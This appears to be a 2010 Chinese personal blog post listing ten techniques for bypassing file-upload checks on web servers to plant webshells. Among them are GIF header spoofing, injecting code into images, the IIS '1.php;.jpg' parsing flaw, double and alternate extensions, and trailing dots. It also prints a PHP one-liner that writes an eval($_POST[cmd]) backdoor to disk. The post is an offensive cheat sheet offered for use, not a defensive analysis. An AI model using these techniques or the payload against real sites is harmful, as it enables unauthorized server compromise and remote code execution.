注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

lx121225的个人主页

 
 
 

日志

 
 

各种上传漏洞的利用方法  

2010-12-15 08:23:11|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
1、文件头+GIF89a法。(php)gif 文件头欺骗,gif89a文件头检测是指程序为了他人将asp等文件后缀改为gif后上传,读取gif文件头,检测是否有gif87a或gif89a标记,是就允许上传,不是就说明不是gif文件。而欺骗刚好是利用检测这两个标记,只要在木马代码前加gif87a就能骗过去。
2、使用edjpgcom工具向图片注入代码。(php)
3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,我从来没成功过。
4、C32asm打开图片在文件末尾空一格加入代码 。(php)
5、在4基础上改进代码
<?php fputs(fopen(“error.php”.”w”).”<?eval_r(\$_POST[cmd]);?>”)?>
。(php)//同目录下生成error.php
6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。
7、nc抓包改数据   //路径名和文件名没有过滤。
8、.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
9.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell。
10.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
(在黑客防线上看到一个挖掘出来的漏洞就是在aspx的后面加上“.”不知道是不是一个原理)
  评论这张
 
阅读(109)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017